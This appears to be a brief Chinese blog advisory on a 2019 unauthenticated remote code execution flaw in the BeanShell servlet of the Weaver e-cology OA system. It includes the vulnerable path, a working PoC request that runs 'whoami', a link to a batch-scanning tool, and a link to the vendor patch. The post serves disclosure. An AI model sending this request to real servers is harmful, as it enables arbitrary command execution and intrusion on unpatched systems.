泛微E-cology OA远程代码执行漏洞0day 复现/POC

技术 作者:有料 2019-10-03 23:28:48
2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令,目前该漏洞安全补丁已发布,请使用泛微e-cology OA系统的用户尽快采取防护措施。
  • 漏洞名称:泛微e-cology OA系统远程代码执行漏洞
  • 威胁等级:严重
  • 影响范围:泛微e-cology <= 9.0
  • 漏洞类型:远程代码执行漏洞
  • 利用难度:容易

复现

漏洞路径:/weaver/bsh.servlet.BshServlet poc:
bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
批量检测:https://github.com/sunird/e-cology-poc

修复

官方补丁:https://www.weaver.com.cn/cs/securityDownload.asp

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接